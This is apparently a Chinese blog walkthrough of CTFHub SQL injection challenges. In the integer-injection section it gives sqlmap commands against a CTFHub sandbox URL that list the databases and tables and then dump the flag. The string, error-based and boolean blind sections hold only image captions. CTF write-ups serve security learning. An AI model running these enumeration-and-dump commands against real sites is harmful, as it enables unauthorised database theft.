CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注

SQL 整数型注入

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第1张图片
第一次比赛就是败给了sql注入的题目- -
我这里给出一种用sqlmap的方法 除了最后回弹数据有点慢

python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 --dbs

直接爆数据库得到
CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第2张图片
前三张表都是自带的 直接爆sqli

python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第3张图片
爆表

python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第4张图片
爆字段

python sqlmap.py -u http://challenge-0da82b744cd4b04e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

拿到flag
CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第5张图片
剩下的如法炮制即可

字符型注入

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第6张图片

报错注入

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第7张图片

布尔盲注

CTFHub-SQL注入 整数型注入 字符型注入 报错注入 布尔盲注_第8张图片

你可能感兴趣的:(CTF)